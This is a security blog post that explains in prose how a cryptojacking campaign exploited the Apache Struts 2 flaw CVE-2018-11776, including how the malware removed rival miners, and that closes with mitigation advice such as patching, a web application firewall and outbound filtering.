That Didn't Take Long: Apache Struts 2 Vulnerability Widely Exploited in Cryptojacking Campaign
A little over a year after a vulnerability in Apache Struts (CVE-2017-5638) led Equifax to lose the personal data on almost 150 million Americans, yet another new critical Remote Code Execution (RCE) vulnerability was found in Apache Struts last month. This vulnerability, dubbed Apache Struts 2 (CVE-2018-11776) or just "Struts 2", allows a remote attacker to execute arbitrary code on an application that was compiled with a vulnerable version of Apache Struts. Just two weeks after this vulnerability disclosure, security researchers discovered a widespread cryptojacking campaign leveraging the Struts 2 vulnerability. While cryptojacking has seen a surge in popularity throughout 2018, what makes this attack campaign particularly interesting is that the attackers acknowledge that they may not be the first or the last cryptojacking campaign to hit a vulnerable server and created code to specifically remove other malware on the machine.
Like a script that reads out of HBO’s The Wire (language warning on the link) or Netflix’s Narcos, where rival drug gangs fight amongst each other for territory, product, and influence, the cyberworld is no different than real life drug wars. Forget about the authorities, many organized criminal organizations face their biggest threat from rival gangs, cartels, or syndicates. The latest cryptojacking campaign targeting the Struts 2 vulnerable servers is very careful to ensure no other cryptojacking campaigns steal their ill-gotten gains.
The attack campaign starts with sending a specially crafted URL that leverages the Struts 2 vulnerability to execute arbitrary code, giving the attacker shell access to the machine. Once the attacker gains shell access, a script is downloaded to prepare the server for mining Monero cryptocurrency. Monero is especially popular in cryptojacking campaigns because unlike Bitcoin and Ethereum, Monero is friendly to CPU mining and hostile towards GPU and ASIC (Application-Specific Integrated Circuits) mining. Attackers are much more likely to find spare CPU cycles on vulnerable machines than high-end GPUs and ASICs. Monero cryptocurrency is also designed with stronger anonymity for its users allowing criminals to better remain unknown. After the server is adequately prepared, several CRON jobs are set up to download second-stage attack payloads, phone home to a hard-coded command and control (C2) server, and remove any rival processes running on the machine.
Second-stage payloads allow the cryptocurrency miner to be modular, but mainly used to download and run the Monero miner. If the original payload ever became blocked or compromised, the command and control server could instruct the machine to download an updated version of the payload. The command and control server is set up to only allow communication with Linux user-agent strings in an attempt to limit security researchers from discovering its true nature. At the time of writing, the attack campaign used a hard-coded mining pool that is currently offline. It is likely that a command and control update will modify the mining pool to a different one in an attempt to circumvent any blocks. Lastly, the CRON job to delete rival processes ensures all of the available CPU cycles are dedicated towards the attacker’s specific cryptojacking campaign. This process looks for binaries commonly used in rival cryptojacking campaigns and delete them, search for processes consuming more than 60 percent of CPU cycles and terminate the processes, then rename its own cryptojacking process to something that looks benign such as sshd or apache. A systems administrator may look at the apache process consuming a high percentage of CPU cycles and this could appear normal.
The action of malware that removes other previously installed malware and closes any vulnerabilities that it used to exploit the machine is not a new development. For example, the Hajime IoT botnet infected vulnerable devices, closed all backdoors, vulnerable ports, and disabled remote access so no other botnets could infect the vulnerable device. Brian Krebs' security blog has a nice breakdown on the value of a compromised PC which is good evidence that a single attacker would not want to leave any money on the table, especially when cryptojacking attack operations are a zero-sum game. If one malware strain consumes 100% of CPU resources, another malware strain on the machine will necessarily get 0%.
The simplest way to not to be vulnerable against Struts 2 is to update Struts to a supported version and recompile the web application. While this is likely not feasible for 100% of affected applications, such as an organization that paid a one-time fee for someone to develop an application and cannot afford to have it updated, there are some mitigations that can assist with limiting exposure. A web application firewall would help prevent the exploit from hitting the vulnerable web application. Using an outbound web proxy service can block access to the command and control servers based on threat intelligence or heuristic behavior, block access to cryptomining pools, and block known cryptomining behavior. As criminals get more sophisticated, so must security researchers. It also does not take an enterprise-level security budget to get basic protections such as those offered freely from The Cyber Threat Alliance’s Quad 9 DNS service.